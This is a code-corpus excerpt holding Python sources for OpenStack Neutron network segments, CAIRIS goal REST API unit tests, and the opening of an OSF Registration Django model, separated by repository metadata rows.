from neutron.db import segments_db as db
from neutron.extensions import segment as extension
from neutron import manager
from neutron.objects import base as base_obj
from neutron.objects import network
from neutron.services.segments import exceptions
_USER_CONFIGURED_SEGMENT_PLUGIN = None
def check_user_configured_segment_plugin():
global _USER_CONFIGURED_SEGMENT_PLUGIN
if _USER_CONFIGURED_SEGMENT_PLUGIN is None:
segment_class = 'neutron.services.segments.plugin.Plugin'
_USER_CONFIGURED_SEGMENT_PLUGIN = any(
p in cfg.CONF.service_plugins for p in ['segments', segment_class])
return _USER_CONFIGURED_SEGMENT_PLUGIN
class SegmentDbMixin(common_db_mixin.CommonDbMixin):
@staticmethod
def _make_segment_dict(segment_obj, fields=None):
res = {'id': segment_obj['id'],
'network_id': segment_obj['network_id'],
'name': segment_obj['name'],
'description': segment_obj['description'],
db.PHYSICAL_NETWORK: segment_obj[db.PHYSICAL_NETWORK],
db.NETWORK_TYPE: segment_obj[db.NETWORK_TYPE],
db.SEGMENTATION_ID: segment_obj[db.SEGMENTATION_ID],
'hosts': segment_obj['hosts'],
'segment_index': segment_obj['segment_index']}
resource_extend.apply_funcs('segments', res, segment_obj.db_obj)
return db_utils.resource_fields(res, fields)
def _get_segment(self, context, segment_id):
segment = network.NetworkSegment.get_object(context, id=segment_id)
if not segment:
raise exceptions.SegmentNotFound(segment_id=segment_id)
return segment
@log_helpers.log_method_call
def create_segment(self, context, segment):
segment = segment['segment']
segment_id = segment.get('id') or uuidutils.generate_uuid()
try:
new_segment = self._create_segment_db(context, segment_id, segment)
except db_exc.DBReferenceError:
raise n_exc.NetworkNotFound(net_id=segment['network_id'])
registry.notify(resources.SEGMENT, events.AFTER_CREATE, self,
context=context, segment=new_segment)
return self._make_segment_dict(new_segment)
def _create_segment_db(self, context, segment_id, segment):
with db_api.CONTEXT_WRITER.using(context):
network_id = segment['network_id']
physical_network = segment[extension.PHYSICAL_NETWORK]
if physical_network == constants.ATTR_NOT_SPECIFIED:
physical_network = None
network_type = segment[extension.NETWORK_TYPE]
segmentation_id = segment[extension.SEGMENTATION_ID]
if segmentation_id == constants.ATTR_NOT_SPECIFIED:
segmentation_id = None
name = segment['name']
if name == constants.ATTR_NOT_SPECIFIED:
name = None
description = segment['description']
if description == constants.ATTR_NOT_SPECIFIED:
description = None
args = {'id': segment_id,
'network_id': network_id,
'name': name,
'description': description,
db.PHYSICAL_NETWORK: physical_network,
db.NETWORK_TYPE: network_type,
db.SEGMENTATION_ID: segmentation_id}
segment_index = 0
segments = self.get_segments(
context,
filters={'network_id': [network_id]},
fields=['segment_index'],
sorts=[('segment_index', True)])
if segments:
segment_index = (segments[-1].get('segment_index') + 1)
args['segment_index'] = segment_index
new_segment = network.NetworkSegment(context, **args)
new_segment.create()
registry.notify(
resources.SEGMENT, events.PRECOMMIT_CREATE, self,
context=context, segment=new_segment)
new_segment.update()
return new_segment
@log_helpers.log_method_call
def update_segment(self, context, uuid, segment):
segment = segment['segment']
with db_api.CONTEXT_WRITER.using(context):
curr_segment = self._get_segment(context, uuid)
curr_segment.update_fields(segment)
curr_segment.update()
return self._make_segment_dict(curr_segment)
@log_helpers.log_method_call
def get_segment(self, context, uuid, fields=None):
segment_db = self._get_segment(context, uuid)
return self._make_segment_dict(segment_db, fields)
@log_helpers.log_method_call
def get_segments(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
filters = filters or {}
pager = base_obj.Pager(sorts, limit, page_reverse, marker)
segment_objs = network.NetworkSegment.get_objects(
context, _pager=pager, **filters)
return [self._make_segment_dict(obj) for obj in segment_objs]
@log_helpers.log_method_call
def get_segments_count(self, context, filters=None):
filters = filters or {}
return network.NetworkSegment.count(context, **filters)
@log_helpers.log_method_call
def get_segments_by_hosts(self, context, hosts):
if not hosts:
return []
segment_host_mapping = network.SegmentHostMapping.get_objects(
context, host=hosts)
return list({mapping.segment_id for mapping in segment_host_mapping})
@log_helpers.log_method_call
def delete_segment(self, context, uuid, for_net_delete=False):
segment_dict = self.get_segment(context, uuid)
registry.publish(resources.SEGMENT, events.BEFORE_DELETE,
self.delete_segment,
payload=events.DBEventPayload(
context, metadata={
'for_net_delete': for_net_delete},
states=(segment_dict,),
resource_id=uuid))
with db_api.CONTEXT_WRITER.using(context):
if not network.NetworkSegment.delete_objects(context, id=uuid):
raise exceptions.SegmentNotFound(segment_id=uuid)
registry.notify(resources.SEGMENT, events.PRECOMMIT_DELETE,
self.delete_segment, context=context,
segment=segment_dict)
registry.publish(resources.SEGMENT, events.AFTER_DELETE,
self.delete_segment,
payload=events.DBEventPayload(
context, states=(segment_dict,),
resource_id=uuid))
@db_api.retry_if_session_inactive()
@lockutils.synchronized('update_segment_host_mapping')
def update_segment_host_mapping(context, host, current_segment_ids):
with db_api.CONTEXT_WRITER.using(context):
segment_host_mapping = network.SegmentHostMapping.get_objects(
context, host=host)
previous_segment_ids = {
seg_host['segment_id'] for seg_host in segment_host_mapping}
for segment_id in current_segment_ids - previous_segment_ids:
network.SegmentHostMapping(
context, segment_id=segment_id, host=host).create()
stale_segment_ids = previous_segment_ids - current_segment_ids
if stale_segment_ids:
for entry in segment_host_mapping:
if entry.segment_id in stale_segment_ids:
entry.delete()
def get_hosts_mapped_with_segments(context):
segment_host_mapping = network.SegmentHostMapping.get_objects(context)
return {row.host for row in segment_host_mapping}
def _get_phys_nets(agent):
configurations_dict = agent.get('configurations', {})
mappings = configurations_dict.get('bridge_mappings', {})
mappings.update(configurations_dict.get('interface_mappings', {}))
mappings.update(configurations_dict.get('device_mappings', {}))
return list(mappings.keys())
reported_hosts = set()
segments_plugin = None
def get_segments_with_phys_nets(context, phys_nets):
phys_nets = list(phys_nets)
if not phys_nets:
return []
with db_api.CONTEXT_READER.using(context):
return network.NetworkSegment.get_objects(
context, physical_network=phys_nets)
def map_segment_to_hosts(context, segment_id, hosts):
with db_api.CONTEXT_WRITER.using(context):
for host in hosts:
network.SegmentHostMapping(
context, segment_id=segment_id, host=host).create()
def _update_segment_host_mapping_for_agent(resource, event, trigger,
payload=None):
plugin = payload.metadata.get('plugin')
agent = payload.desired_state
host = payload.metadata.get('host')
context = payload.context
check_segment_for_agent = getattr(plugin, 'check_segment_for_agent', None)
if (not check_user_configured_segment_plugin() or
not check_segment_for_agent):
return
phys_nets = _get_phys_nets(agent)
if not phys_nets:
return
start_flag = agent.get('start_flag', None)
if host in reported_hosts and not start_flag:
return
reported_hosts.add(host)
segments = get_segments_with_phys_nets(context, phys_nets)
current_segment_ids = {
segment['id'] for segment in segments
if check_segment_for_agent(segment, agent)}
update_segment_host_mapping(context, host, current_segment_ids)
registry.notify(resources.SEGMENT_HOST_MAPPING, events.AFTER_CREATE,
plugin, context=context, host=host,
current_segment_ids=current_segment_ids)
def _add_segment_host_mapping_for_segment(resource, event, trigger,
context, segment):
if not context.session.is_active:
return
if not segment.physical_network:
return
cp = directory.get_plugin()
check_segment_for_agent = getattr(cp, 'check_segment_for_agent', None)
if not check_user_configured_segment_plugin() or not hasattr(
cp, 'get_agents') or not check_segment_for_agent:
registry.unsubscribe(_add_segment_host_mapping_for_segment,
resources.SEGMENT, events.PRECOMMIT_CREATE)
return
hosts = {agent['host'] for agent in cp.get_agents(context)
if check_segment_for_agent(segment, agent)}
map_segment_to_hosts(context, segment.id, hosts)
def _delete_segments_for_network(resource, event, trigger,
context, network_id):
admin_ctx = context.elevated()
global segments_plugin
if not segments_plugin:
segments_plugin = manager.NeutronManager.load_class_for_provider(
'neutron.service_plugins', 'segments')()
segments = segments_plugin.get_segments(
admin_ctx, filters={'network_id': [network_id]})
for segment in segments:
segments_plugin.delete_segment(admin_ctx, segment['id'],
for_net_delete=True)
def subscribe():
registry.subscribe(_update_segment_host_mapping_for_agent,
resources.AGENT,
events.AFTER_CREATE)
registry.subscribe(_update_segment_host_mapping_for_agent,
resources.AGENT,
events.AFTER_UPDATE)
registry.subscribe(_add_segment_host_mapping_for_segment,
resources.SEGMENT, events.PRECOMMIT_CREATE)
registry.subscribe(_delete_segments_for_network,
resources.NETWORK,
events.PRECOMMIT_DELETE)
subscribe()
| true | true |
f725eaff0d679e4b23a48f9e1c42ebd9f7f1365b | 8,673 | py | Python | cairis/test/test_GoalAPI.py | RAIJ95/https-github.com-failys-cairis | 86601347ea016f4a3f90b6942093d63e91de5f74 | [
"Apache-2.0"
] | null | null | null | cairis/test/test_GoalAPI.py | RAIJ95/https-github.com-failys-cairis | 86601347ea016f4a3f90b6942093d63e91de5f74 | [
"Apache-2.0"
] | null | null | null | cairis/test/test_GoalAPI.py | RAIJ95/https-github.com-failys-cairis | 86601347ea016f4a3f90b6942093d63e91de5f74 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
from urllib import quote
import jsonpickle
from cairis.core.Goal import Goal
from cairis.core.GoalEnvironmentProperties import GoalEnvironmentProperties
from cairis.test.CairisDaemonTestCase import CairisDaemonTestCase
import os
from cairis.mio.ModelImport import importModelFile
__author__ = 'Robin Quetin, Shamal Faily'
class GoalAPITests(CairisDaemonTestCase):
    """REST API tests for the CAIRIS daemon's /api/goals endpoints."""

    @classmethod
    def setUpClass(cls):
        # Import the NeuroGrid exemplar model once so every test in this
        # class runs against a known database state under session 'test'.
        importModelFile(os.environ['CAIRIS_SRC'] + '/../examples/exemplars/NeuroGrid/NeuroGrid.xml',1,'test')

    def setUp(self):
        """Prepare per-test fixtures referencing the imported model."""
        # region Class fields
        self.logger = logging.getLogger(__name__)
        # Names below must exist in the imported NeuroGrid exemplar model.
        self.existing_goal_name = 'Multi-Factor Authentication'
        self.existing_category = 'Maintain'
        self.existing_environment_name_1 = 'Stroke'
        self.existing_environment_name_2 = 'Psychosis'
        # Fully-qualified class path of Goal, used in jsonpickle payloads.
        self.goal_class = Goal.__module__+'.'+Goal.__name__
        self.to_delete_ids = []
        # endregion

    def test_get_all(self):
        """GET /api/goals returns a non-empty dictionary of goals."""
        method = 'test_get_all'
        rv = self.app.get('/api/goals?session_id=test')
        goals = jsonpickle.decode(rv.data)
        self.assertIsNotNone(goals, 'No results after deserialization')
        self.assertIsInstance(goals, dict, 'The result is not a dictionary as expected')
        self.assertGreater(len(goals), 0, 'No goals in the dictionary')
        self.logger.info('[%s] Goals found: %d', method, len(goals))
        goal = goals.values()[0]
        self.logger.info('[%s] First goal: %s [%d]\n', method, goal['theName'], goal['theId'])

    def test_get_by_name(self):
        """GET /api/goals/name/<name> returns the named goal."""
        method = 'test_get_by_name'
        url = '/api/goals/name/%s?session_id=test' % quote(self.existing_goal_name)
        rv = self.app.get(url)
        self.assertIsNotNone(rv.data, 'No response')
        self.logger.debug('[%s] Response data: %s', method, rv.data)
        goal = jsonpickle.decode(rv.data)
        self.assertIsNotNone(goal, 'No results after deserialization')
        self.logger.info('[%s] Goal: %s [%d]\n', method, goal['theName'], goal['theId'])

    def test_delete(self):
        """DELETE removes a goal previously created via POST."""
        method = 'test_delete'
        url = '/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName)
        new_goal_body = self.prepare_json()
        # Delete first in case a previous run left the goal behind, then
        # create the goal that this test will delete.
        self.app.delete(url)
        self.logger.info('[%s] Object to delete: %s', method, new_goal_body)
        self.app.post('/api/goals', content_type='application/json', data=new_goal_body)
        self.logger.info('[%s] URL: %s', method, url)
        rv = self.app.delete(url)
        self.logger.info('[%s] Response data: %s', method, rv.data)
        self.assertIsNotNone(rv.data, 'No response')
        json_resp = jsonpickle.decode(rv.data)
        self.assertIsInstance(json_resp, dict, 'The response cannot be converted to a dictionary')
        message = json_resp.get('message', None)
        self.assertIsNotNone(message, 'No message in response')
        self.logger.info('[%s] Message: %s\n', method, message)

    def test_post(self):
        """POST /api/goals creates a goal and returns its new id."""
        method = 'test_post'
        url = '/api/goals'
        self.logger.info('[%s] URL: %s', method, url)
        new_goal_body = self.prepare_json()
        # Remove any stale copy of the test goal before creating it.
        self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
        rv = self.app.post(url, content_type='application/json', data=new_goal_body)
        self.logger.debug('[%s] Response data: %s', method, rv.data)
        json_resp = jsonpickle.decode(rv.data)
        self.assertIsNotNone(json_resp, 'No results after deserialization')
        env_id = json_resp.get('goal_id', None)
        self.assertIsNotNone(env_id, 'No goal ID returned')
        self.assertGreater(env_id, 0, 'Invalid goal ID returned [%d]' % env_id)
        self.logger.info('[%s] Goal ID: %d\n', method, env_id)
        # Clean up the goal this test created.
        rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))

    def test_put(self):
        """PUT /api/goals/name/<name> renames/updates an existing goal."""
        method = 'test_put'
        url = '/api/goals'
        self.logger.info('[%s] URL: %s', method, url)
        new_goal_body = self.prepare_json()
        # Reset then create the goal that will subsequently be updated.
        rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
        rv = self.app.post(url, content_type='application/json', data=new_goal_body)
        self.logger.debug('[%s] Response data: %s', method, rv.data)
        json_resp = jsonpickle.decode(rv.data)
        self.assertIsNotNone(json_resp, 'No results after deserialization')
        env_id = json_resp.get('goal_id', None)
        self.assertIsNotNone(env_id, 'No goal ID returned')
        self.assertGreater(env_id, 0, 'Invalid goal ID returned [%d]' % env_id)
        self.logger.info('[%s] Goal ID: %d', method, env_id)
        # Rename the goal and push the change via PUT against the old name.
        goal_to_update = self.prepare_new_goal()
        goal_to_update.theName = 'Edited test goal'
        goal_to_update.theId = env_id
        upd_env_body = self.prepare_json(goal=goal_to_update)
        rv = self.app.put('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName), data=upd_env_body, content_type='application/json')
        self.assertIsNotNone(rv.data, 'No response')
        json_resp = jsonpickle.decode(rv.data)
        self.assertIsNotNone(json_resp)
        self.assertIsInstance(json_resp, dict)
        message = json_resp.get('message', None)
        self.assertIsNotNone(message, 'No message in response')
        self.logger.info('[%s] Message: %s', method, message)
        self.assertGreater(message.find('successfully updated'), -1, 'The goal was not successfully updated')
        # Fetch the goal under its new name to confirm the update stuck.
        rv = self.app.get('/api/goals/name/%s?session_id=test' % quote(goal_to_update.theName))
        upd_goal = jsonpickle.decode(rv.data)
        self.assertIsNotNone(upd_goal, 'Unable to decode JSON data')
        self.logger.debug('[%s] Response data: %s', method, rv.data)
        self.logger.info('[%s] Goal: %s [%d]\n', method, upd_goal['theName'], upd_goal['theId'])
        rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(goal_to_update.theName))

    def prepare_new_goal(self):
        """Build a transient Goal fixture with two environment properties."""
        new_goal_refinements = [
            [
                "PreventUnauthorised Certificate Access",
                "goal",
                "or",
                "No",
                "None"
            ]
        ]
        new_subgoal_refinements = [
            [
                "PreventUnauthorised Certificate Access",
                "goal",
                "or",
                "No",
                "None"
            ]
        ]
        new_goal_props = [
            GoalEnvironmentProperties(
                environmentName=self.existing_environment_name_1,
                lbl='Test 1',
                definition='This is a first test property',
                category=self.existing_category,
                priority='Medium',
                fitCriterion='None',
                issue='None',
                goalRefinements=new_goal_refinements,
                subGoalRefinements=new_subgoal_refinements,
                concs=[],cas=[]
            ),
            GoalEnvironmentProperties(
                environmentName=self.existing_environment_name_2,
                lbl='Test 2',
                definition='This is a second test property',
                category=self.existing_category,
                priority='Low',
                fitCriterion='None',
                issue='Test issue',
                goalRefinements=new_goal_refinements,
                subGoalRefinements=new_subgoal_refinements,
                concs=[],cas=[]
            )
        ]
        new_goal = Goal(
            goalId=-1,
            goalName='Test goal',
            goalOrig='',
            tags=['test', 'test123'],
            environmentProperties=[]
        )
        new_goal.theEnvironmentProperties = new_goal_props
        # Strip helper dictionaries that should not travel in the JSON
        # request payload.
        new_goal.theEnvironmentDictionary = {}
        new_goal.theGoalPropertyDictionary = {}
        delattr(new_goal, 'theEnvironmentDictionary')
        delattr(new_goal, 'theGoalPropertyDictionary')
        return new_goal

    def prepare_dict(self, goal=None):
        """Wrap a goal in the session/object envelope the API expects."""
        if goal is None:
            goal = self.prepare_new_goal()
        else:
            assert isinstance(goal, Goal)
        return {
            'session_id': 'test',
            'object': goal,
        }

    def prepare_json(self, data_dict=None, goal=None):
        """Serialize the request envelope to a JSON string for the API."""
        if data_dict is None:
            data_dict = self.prepare_dict(goal=goal)
        else:
            assert isinstance(data_dict, dict)
        new_goal_body = jsonpickle.encode(data_dict, unpicklable=False)
        self.logger.info('JSON data: %s', new_goal_body)
        return new_goal_body
| 38.71875 | 152 | 0.684769 |
import logging
from urllib import quote
import jsonpickle
from cairis.core.Goal import Goal
from cairis.core.GoalEnvironmentProperties import GoalEnvironmentProperties
from cairis.test.CairisDaemonTestCase import CairisDaemonTestCase
import os
from cairis.mio.ModelImport import importModelFile
__author__ = 'Robin Quetin, Shamal Faily'
class GoalAPITests(CairisDaemonTestCase):
@classmethod
def setUpClass(cls):
importModelFile(os.environ['CAIRIS_SRC'] + '/../examples/exemplars/NeuroGrid/NeuroGrid.xml',1,'test')
def setUp(self):
self.logger = logging.getLogger(__name__)
self.existing_goal_name = 'Multi-Factor Authentication'
self.existing_category = 'Maintain'
self.existing_environment_name_1 = 'Stroke'
self.existing_environment_name_2 = 'Psychosis'
self.goal_class = Goal.__module__+'.'+Goal.__name__
self.to_delete_ids = []
def test_get_all(self):
method = 'test_get_all'
rv = self.app.get('/api/goals?session_id=test')
goals = jsonpickle.decode(rv.data)
self.assertIsNotNone(goals, 'No results after deserialization')
self.assertIsInstance(goals, dict, 'The result is not a dictionary as expected')
self.assertGreater(len(goals), 0, 'No goals in the dictionary')
self.logger.info('[%s] Goals found: %d', method, len(goals))
goal = goals.values()[0]
self.logger.info('[%s] First goal: %s [%d]\n', method, goal['theName'], goal['theId'])
def test_get_by_name(self):
method = 'test_get_by_name'
url = '/api/goals/name/%s?session_id=test' % quote(self.existing_goal_name)
rv = self.app.get(url)
self.assertIsNotNone(rv.data, 'No response')
self.logger.debug('[%s] Response data: %s', method, rv.data)
goal = jsonpickle.decode(rv.data)
self.assertIsNotNone(goal, 'No results after deserialization')
self.logger.info('[%s] Goal: %s [%d]\n', method, goal['theName'], goal['theId'])
def test_delete(self):
method = 'test_delete'
url = '/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName)
new_goal_body = self.prepare_json()
self.app.delete(url)
self.logger.info('[%s] Object to delete: %s', method, new_goal_body)
self.app.post('/api/goals', content_type='application/json', data=new_goal_body)
self.logger.info('[%s] URL: %s', method, url)
rv = self.app.delete(url)
self.logger.info('[%s] Response data: %s', method, rv.data)
self.assertIsNotNone(rv.data, 'No response')
json_resp = jsonpickle.decode(rv.data)
self.assertIsInstance(json_resp, dict, 'The response cannot be converted to a dictionary')
message = json_resp.get('message', None)
self.assertIsNotNone(message, 'No message in response')
self.logger.info('[%s] Message: %s\n', method, message)
def test_post(self):
method = 'test_post'
url = '/api/goals'
self.logger.info('[%s] URL: %s', method, url)
new_goal_body = self.prepare_json()
self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
rv = self.app.post(url, content_type='application/json', data=new_goal_body)
self.logger.debug('[%s] Response data: %s', method, rv.data)
json_resp = jsonpickle.decode(rv.data)
self.assertIsNotNone(json_resp, 'No results after deserialization')
env_id = json_resp.get('goal_id', None)
self.assertIsNotNone(env_id, 'No goal ID returned')
self.assertGreater(env_id, 0, 'Invalid goal ID returned [%d]' % env_id)
self.logger.info('[%s] Goal ID: %d\n', method, env_id)
rv = self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
def test_put(self):
    """Exercise PUT /api/goals/name/<name>: create a goal, rename it via
    PUT, confirm the update message and the new name, then clean up."""
    tag = 'test_put'
    url = '/api/goals'
    self.logger.info('[%s] URL: %s', tag, url)
    create_body = self.prepare_json()
    # Start from a clean slate, then create the goal to be updated.
    response = self.app.delete('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName))
    response = self.app.post(url, content_type='application/json', data=create_body)
    self.logger.debug('[%s] Response data: %s', tag, response.data)
    payload = jsonpickle.decode(response.data)
    self.assertIsNotNone(payload, 'No results after deserialization')
    created_id = payload.get('goal_id', None)
    self.assertIsNotNone(created_id, 'No goal ID returned')
    self.assertGreater(created_id, 0, 'Invalid goal ID returned [%d]' % created_id)
    self.logger.info('[%s] Goal ID: %d', tag, created_id)
    # Build the updated goal (new name, same ID) and PUT it under the old name.
    goal_to_update = self.prepare_new_goal()
    goal_to_update.theName = 'Edited test goal'
    goal_to_update.theId = created_id
    update_body = self.prepare_json(goal=goal_to_update)
    response = self.app.put('/api/goals/name/%s?session_id=test' % quote(self.prepare_new_goal().theName), data=update_body, content_type='application/json')
    self.assertIsNotNone(response.data, 'No response')
    payload = jsonpickle.decode(response.data)
    self.assertIsNotNone(payload)
    self.assertIsInstance(payload, dict)
    message = payload.get('message', None)
    self.assertIsNotNone(message, 'No message in response')
    self.logger.info('[%s] Message: %s', tag, message)
    self.assertGreater(message.find('successfully updated'), -1, 'The goal was not successfully updated')
    # Fetch the goal back under its new name and verify it decodes.
    response = self.app.get('/api/goals/name/%s?session_id=test' % quote(goal_to_update.theName))
    fetched = jsonpickle.decode(response.data)
    self.assertIsNotNone(fetched, 'Unable to decode JSON data')
    self.logger.debug('[%s] Response data: %s', tag, response.data)
    self.logger.info('[%s] Goal: %s [%d]\n', tag, fetched['theName'], fetched['theId'])
    # Clean up the renamed goal.
    response = self.app.delete('/api/goals/name/%s?session_id=test' % quote(goal_to_update.theName))
def prepare_new_goal(self):
    """Build and return a transient Goal fixture (id -1, two environment
    properties) ready to be serialized for the API tests."""
    # Both refinement lists carry the same single row; build each as its
    # own list object, mirroring the original fixture shape.
    refinement_row = [
        "PreventUnauthorised Certificate Access",
        "goal",
        "or",
        "No",
        "None"
    ]
    goal_refinements = [list(refinement_row)]
    subgoal_refinements = [list(refinement_row)]
    # (environment, label, definition, priority, issue) per property.
    property_specs = [
        (self.existing_environment_name_1, 'Test 1',
         'This is a first test property', 'Medium', 'None'),
        (self.existing_environment_name_2, 'Test 2',
         'This is a second test property', 'Low', 'Test issue'),
    ]
    environment_props = [
        GoalEnvironmentProperties(
            environmentName=env_name,
            lbl=label,
            definition=definition,
            category=self.existing_category,
            priority=priority,
            fitCriterion='None',
            issue=issue,
            goalRefinements=goal_refinements,
            subGoalRefinements=subgoal_refinements,
            concs=[], cas=[]
        )
        for env_name, label, definition, priority, issue in property_specs
    ]
    fixture = Goal(
        goalId=-1,
        goalName='Test goal',
        goalOrig='',
        tags=['test', 'test123'],
        environmentProperties=[]
    )
    fixture.theEnvironmentProperties = environment_props
    # Strip the dictionary attributes the serializer must not see.
    fixture.theEnvironmentDictionary = {}
    fixture.theGoalPropertyDictionary = {}
    delattr(fixture, 'theEnvironmentDictionary')
    delattr(fixture, 'theGoalPropertyDictionary')
    return fixture
def prepare_dict(self, goal=None):
    """Wrap *goal* (or a freshly built fixture when None) in the request
    envelope expected by the API: session id plus the object itself."""
    if goal is not None:
        assert isinstance(goal, Goal)
    else:
        goal = self.prepare_new_goal()
    return {
        'session_id': 'test',
        'object': goal,
    }
def prepare_json(self, data_dict=None, goal=None):
    """Serialize a request envelope to JSON; builds the envelope from
    *goal* when *data_dict* is not supplied."""
    if data_dict is not None:
        assert isinstance(data_dict, dict)
    else:
        data_dict = self.prepare_dict(goal=goal)
    encoded = jsonpickle.encode(data_dict, unpicklable=False)
    self.logger.info('JSON data: %s', encoded)
    return encoded
| true | true |
f725eb967997a72b04e8458957fc69f1e97cbee0 | 24,951 | py | Python | osf/models/registrations.py | mattclark/osf.io | 7a362ceb6af3393d3d0423aafef336ee13277303 | [
"Apache-2.0"
] | null | null | null | osf/models/registrations.py | mattclark/osf.io | 7a362ceb6af3393d3d0423aafef336ee13277303 | [
"Apache-2.0"
] | null | null | null | osf/models/registrations.py | mattclark/osf.io | 7a362ceb6af3393d3d0423aafef336ee13277303 | [
"Apache-2.0"
] | null | null | null | import logging
import datetime
import urlparse
from django.core.exceptions import ValidationError
from django.db import models
from django.utils import timezone
from framework.auth import Auth
from framework.exceptions import PermissionsError
from osf.utils.fields import NonNaiveDateTimeField
from osf.exceptions import NodeStateError
from website.util import api_v2_url
from website import settings
from website.archiver import ARCHIVER_INITIATED
from osf.models import (
OSFUser, RegistrationSchema,
Retraction, Embargo, DraftRegistrationApproval,
EmbargoTerminationApproval,
)
from osf.models.archive import ArchiveJob
from osf.models.base import BaseModel, ObjectIDMixin
from osf.models.node import AbstractNode
from osf.models.nodelog import NodeLog
from osf.models.provider import RegistrationProvider
from osf.utils.datetime_aware_jsonfield import DateTimeAwareJSONField
logger = logging.getLogger(__name__)
class Registration(AbstractNode):
    """A frozen snapshot of a project Node.

    Carries the sanction machinery (approval, embargo, retraction,
    embargo termination) that governs a registration's lifecycle.
    Sanction accessors delegate to the *root* registration, since
    sanctions are attached only to the root of a registration tree.
    """
    # Fields that remain writable through the API after registration.
    WRITABLE_WHITELIST = [
        'article_doi',
        'description',
        'is_public',
        'node_license',
        'category',
    ]
    provider = models.ForeignKey('RegistrationProvider', related_name='registrations', null=True)
    registered_date = NonNaiveDateTimeField(db_index=True, null=True, blank=True)
    registered_user = models.ForeignKey(OSFUser,
                                        related_name='related_to',
                                        on_delete=models.SET_NULL,
                                        null=True, blank=True)
    registered_schema = models.ManyToManyField(RegistrationSchema)
    registered_meta = DateTimeAwareJSONField(default=dict, blank=True)
    # The Node this registration was created from.
    registered_from = models.ForeignKey('self',
                                        related_name='registrations',
                                        on_delete=models.SET_NULL,
                                        null=True, blank=True)
    # Sanctions
    registration_approval = models.ForeignKey('RegistrationApproval',
                                              related_name='registrations',
                                              null=True, blank=True,
                                              on_delete=models.SET_NULL)
    retraction = models.ForeignKey('Retraction',
                                   related_name='registrations',
                                   null=True, blank=True,
                                   on_delete=models.SET_NULL)
    embargo = models.ForeignKey('Embargo',
                                related_name='registrations',
                                null=True, blank=True,
                                on_delete=models.SET_NULL)
    embargo_termination_approval = models.ForeignKey('EmbargoTerminationApproval',
                                                     related_name='registrations',
                                                     null=True, blank=True,
                                                     on_delete=models.SET_NULL)
    files_count = models.PositiveIntegerField(blank=True, null=True)

    @staticmethod
    def find_failed_registrations():
        """Return root registrations whose archive job was initiated but
        never sent within the configured timeout ("stuck" registrations)."""
        expired_if_before = timezone.now() - settings.ARCHIVE_TIMEOUT_TIMEDELTA
        node_id_list = ArchiveJob.objects.filter(sent=False, datetime_initiated__lt=expired_if_before, status=ARCHIVER_INITIATED).values_list('dst_node', flat=True)
        root_nodes_id = AbstractNode.objects.filter(id__in=node_id_list).values_list('root', flat=True).distinct()
        stuck_regs = AbstractNode.objects.filter(id__in=root_nodes_id, is_deleted=False)
        return stuck_regs

    @property
    def registered_schema_id(self):
        """_id of the first registered schema, or None when none is attached."""
        if self.registered_schema.exists():
            return self.registered_schema.first()._id
        return None

    @property
    def is_registration(self):
        """For v1 compat."""
        return True

    @property
    def is_stuck_registration(self):
        # Membership test against the queryset of stuck registrations.
        return self in self.find_failed_registrations()

    @property
    def is_collection(self):
        """For v1 compat."""
        return False

    @property
    def archive_job(self):
        # Latest-created archive job, or None when the node has none.
        return self.archive_jobs.first() if self.archive_jobs.count() else None

    @property
    def sanction(self):
        """The root's active sanction, checked in precedence order:
        embargo termination > retraction > embargo > registration approval."""
        root = self._dirty_root
        sanction = (
            root.embargo_termination_approval or
            root.retraction or
            root.embargo or
            root.registration_approval
        )
        if sanction:
            return sanction
        else:
            return None

    @property
    def is_registration_approved(self):
        root = self._dirty_root
        if root.registration_approval is None:
            return False
        return root.registration_approval.is_approved

    @property
    def is_pending_embargo(self):
        root = self._dirty_root
        if root.embargo is None:
            return False
        return root.embargo.is_pending_approval

    @property
    def is_pending_embargo_for_existing_registration(self):
        """ Returns True if Node has an Embargo pending approval for an
        existing registrations. This is used specifically to ensure
        registrations pre-dating the Embargo feature do not get deleted if
        their respective Embargo request is rejected.
        """
        root = self._dirty_root
        if root.embargo is None:
            return False
        return root.embargo.pending_registration

    @property
    def is_retracted(self):
        root = self._dirty_root
        if root.retraction is None:
            return False
        return root.retraction.is_approved

    @property
    def is_pending_registration(self):
        root = self._dirty_root
        if root.registration_approval is None:
            return False
        return root.registration_approval.is_pending_approval

    @property
    def is_pending_retraction(self):
        root = self._dirty_root
        if root.retraction is None:
            return False
        return root.retraction.is_pending_approval

    @property
    def is_pending_embargo_termination(self):
        root = self._dirty_root
        if root.embargo_termination_approval is None:
            return False
        return root.embargo_termination_approval.is_pending_approval

    @property
    def is_embargoed(self):
        """A Node is embargoed if:
        - it has an associated Embargo record
        - that record has been approved
        - the node is not public (embargo not yet lifted)
        """
        root = self._dirty_root
        if root.is_public or root.embargo is None:
            return False
        return root.embargo.is_approved

    @property
    def embargo_end_date(self):
        # NOTE(review): returns False (not None) when there is no embargo;
        # callers appear to rely on falsiness only.
        root = self._dirty_root
        if root.embargo is None:
            return False
        return root.embargo.embargo_end_date

    @property
    def archiving(self):
        # True while an archive job exists and its tree has not finished.
        job = self.archive_job
        return job and not job.done and not job.archive_tree_finished()

    @property
    def _dirty_root(self):
        """Equivalent to `self.root`, but don't let Django fetch a clean copy
        when `self == self.root`. Use when it's important to reflect unsaved
        state rather than database state.
        """
        if self.id == self.root_id:
